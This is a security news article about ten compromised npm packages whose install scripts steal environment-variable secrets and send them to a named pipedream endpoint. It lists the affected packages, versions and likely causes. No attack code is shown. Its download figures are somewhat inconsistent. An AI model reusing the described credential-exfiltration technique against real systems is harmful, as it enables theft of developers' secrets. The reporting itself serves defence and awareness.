Listen to this Post
In an alarming development for the developer community, ten popular npm packages were compromised yesterday with malicious code designed to steal sensitive data from developers’ systems. This attack, which specifically targeted cryptocurrency-related npm packages, resulted in the spread of a data-stealing JavaScript that puts API keys, cloud credentials, database credentials, and encryption keys at risk. With some of the affected packages being downloaded thousands of times per week, developers must remain vigilant about their software supply chains.
the Incident
Yesterday, a set of ten npm packages were updated with harmful code designed to steal sensitive information from the environment variables of developers’ systems. This included API keys, database credentials, cloud access keys, and encryption secrets. The most popular package affected was ‘country-currency-map’, which was downloaded frequently. These compromised packages were discovered by Sonatype researcher Ali ElShakankiry.
The malicious code was embedded in two scripts, “/scripts/launch.js” and “/scripts/diagnostic-report.js”, both of which execute as soon as the package is installed. The malware sends stolen data to a remote server hosted at “eoi2ectd5a5tn1h.m.pipedream.net”. These kinds of environment variables are valuable targets because they contain access to critical infrastructure and systems, which cybercriminals can exploit for further attacks.
Sonatype researchers, including malware analyst Ax Sharma, point out that the root cause of this incident is likely the compromise of npm maintainer accounts. These accounts may have been taken over either via credential stuffing (where hackers reuse old passwords from previous breaches) or through an expired domain takeover—two common ways that npm repositories get hijacked. Given that multiple packages from different maintainers were compromised at once, the latter scenario seems less likely. Instead, the more plausible explanation is that attackers gained access to the maintainers’ accounts.
The list of affected packages includes:
– country-currency-map: version 2.1.8, 288 downloads.
– @keepkey/device-protocol: version 7.13.3, 56 downloads.
– bnb-javascript-sdk-nobroadcast: version 2.16.16, 61 downloads.
– @bithighlander/bitcoin-cash-js-lib: version 5.2.2, 61 downloads.
– eslint-config-travix: version 6.3.1, 0 downloads.
– babel-preset-travix: version 1.2.1, 0 downloads.
– @travix/ui-themes: version 1.1.5, 0 downloads.
– @veniceswap/uikit: version 0.65.34, 0 downloads.
– @crosswise-finance1/sdk-v2: version 0.1.21, 0 downloads.
– @veniceswap/eslint-config-pancake: version 1.6.2, 0 downloads.
All but country-currency-map remain available for download on npm. As a precaution, the maintainer of the country-currency-map package deprecated the malicious version (2.1.8) and advised developers to use version 2.1.7 instead, which remains safe.
What Undercode Says:
This attack underscores the ongoing risks associated with the open-source ecosystem, especially in package management systems like npm. While tools like npm offer convenience and power to developers, they also create a prime attack vector for cybercriminals. The fact that these packages were updated with malicious scripts without the knowledge of the maintainers suggests a lapse in security. It’s not just about keeping the code itself secure but also ensuring that the processes around managing and maintaining these repositories are robust.
The attack is particularly alarming given the high frequency of downloads of some of the affected packages. This highlights the scale of the issue, as widespread adoption means a larger pool of potential victims. But what stands out is that the malware wasn’t immediately noticed by the wider community. The discovery of this breach was only made by Sonatype researchers, which raises the question of how long such attacks could have continued if left undetected.
The fact that npm requires two-factor authentication (2FA) for popular packages now, is a step in the right direction. However, many of the affected packages had not been updated in years, which could indicate that their maintainers were no longer actively monitoring or securing them. This points to a broader issue in the open-source community where older projects can fall into neglect. A simple compromise of the maintainer’s login credentials can be disastrous when these packages are widely used by developers around the world.
Moreover, the vulnerability exploitation tactics used in this attack—credential stuffing and domain takeover—are not new, but they are effective. Maintaining strong, unique passwords and ensuring proper security hygiene around domain registration and account management could have prevented this breach from occurring. Additionally, npm needs to improve its approach to safeguarding abandoned or inactive packages, as these are often low-hanging fruit for attackers.
The real challenge, however, lies in ensuring developers remain aware of these risks. Open-source ecosystems are a double-edged sword, where the benefits of collaborative development come with the downside of relying on others’ security practices. Developers need to be vigilant when integrating third-party packages into their projects. One small mistake or overlooked vulnerability can cascade into significant issues—especially when the compromised code is running on systems that are connected to sensitive data.
Fact Checker Results:
- Sonatype’s research confirms that the malicious scripts were embedded in specific npm package versions and executed on installation.
- The attack used environment variables as a vector to exfiltrate sensitive data, a well-known tactic in modern cyber attacks.
- The compromised versions were downloaded a total of 506 times, with the country-currency-map package being the most widely downloaded.
References:
Reported By: https://www.bleepingcomputer.com/news/security/infostealer-campaign-compromises-10-npm-packages-targets-devs/
Extra Source Hub:
https://www.pinterest.com
Wikipedia
Undercode AI
Image Source:
Pexels
Undercode AI DI v2
